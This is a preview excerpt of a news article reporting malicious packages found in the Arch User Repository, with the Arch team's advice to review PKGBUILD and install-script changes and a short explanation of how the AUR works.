Original article excerpt
Server-side extracted preview paragraphs from the original source.
For the second time in a week, the AUR was found to contain malicious applications. What can Arch Linux users do about this?
Researchers at software supply chain management company Sonatype found that the Arch User Repository contained about 1,500 malicious packages, the company said in a blog post updated June 12.
"We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information," The Arch team said in a brief statement.
This does not bode well for a repository that was created to dramatically increase the amount of software available to Arch (and Arch derivative) users.
Also: Archcraft is a solid, super fast distro for anyone ready to move beyond beginner Linux
The AUR is essentially a way for developers to make new software available to users of Arch Linux before it is officially added to the Arch repositories. It's a collection of package descriptions (named PDKGUILDs) that make it possible to compile a package from source code using the makepkg tool and then install the package via the Arch Linux package manager, pacman.
The thing about the AUR is that anyone can upload packages to it, and a group of Trusted Users is charged with keeping tabs on what goes in.